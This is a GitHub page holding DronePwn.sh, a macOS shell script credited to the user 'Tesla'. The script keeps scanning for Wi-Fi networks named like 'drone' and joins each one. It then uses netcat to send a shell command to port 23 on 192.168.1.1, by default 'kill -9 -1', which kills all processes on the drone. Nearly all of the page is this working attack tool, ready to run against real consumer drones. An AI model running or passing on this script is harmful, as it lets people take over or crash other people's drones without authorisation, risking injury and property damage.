-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathDronePwn.sh
executable file
·79 lines (70 loc) · 2.08 KB
/
DronePwn.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
# DronePwn.sh
# Based on Darren Kitchen Conecpt
# Written for OS X 10.9 (but will probably work on most other versions)
# Written by Tesla while very bored
# Usage: bash dronepwn.sh [interface] [shell command to run on drone]
# Both arguments are optional
#!/bin/bash
INTERFACE=''
COMMAND=''
ABRT_WHEN_POSSIBLE=false
function error {
printf "\e[31m%s\e[39m\n" "$1"
}
function warn {
printf "\e[33m%s\e[0m\n" "$1"
}
function log {
printf "\e[1m\e[34m%s\e[0m\n" "$1"
}
function good {
printf "\e[1m\e[32m%s\e[0m\n" "$1"
}
function abrt {
log "[*] Caught interrupt, finishing. . ."
ABRT_WHEN_POSSIBLE=true
}
function pwn_network {
if networksetup -setairportnetwork $INTERFACE $1 > /dev/null 2>/dev/null
then
log "[*] Success!"
log "[*] Attemting to connect and issue kill command. . ."
printf "$COMMAND\n\n" | nc 192.168.1.1 23
log "[*] Moving to next AP (if any). . ."
else
error "[!] Failed to associate!"
fi
}
function pwn_networks {
for ntwrk in $1
do
log "[*] Attemting to associate with ESSID: ${ntwrk}. . ."
pwn_network "${ntwrk}"
done
}
trap abrt SIGINT
if [[ $ABRT_WHEN_POSSIBLE = true ]]; then exit 0; fi
if [[ -z $1 ]]
then
log "[-] No interface specified, attemting to determine wireless interface (this will not work if you are currently not connected to a network). . ."
INTERFACE=$(ifconfig | grep -v '127.0.0.1' | grep -v 'bridge' | grep -B3 -E '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | grep flags | awk '{print $1}' | sed 's/://g')
good "[+] Selected $INTERFACE as wireless interface"
else
INTERFACE=$1
fi
if [[ $ABRT_WHEN_POSSIBLE = true ]]; then exit 0; fi
if [[ -z $2 ]]
then
COMMAND="kill -9 -1"
log "[*] Custom command left blank, using \"kill -9 -1\""
else
COMMAND=$2
fi
if [[ $ABRT_WHEN_POSSIBLE = true ]]; then exit 0; fi
while (true) do
log "[*] Scanning for APs with ESSIDs that contain 'drone'. . ."
ntwrks=( $(/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s | grep 'drone' | awk '{print $1}') )
pwn_networks "${ntwrks[@]}"
if [[ $ABRT_WHEN_POSSIBLE = true ]]; then exit 0; fi
sleep 1
done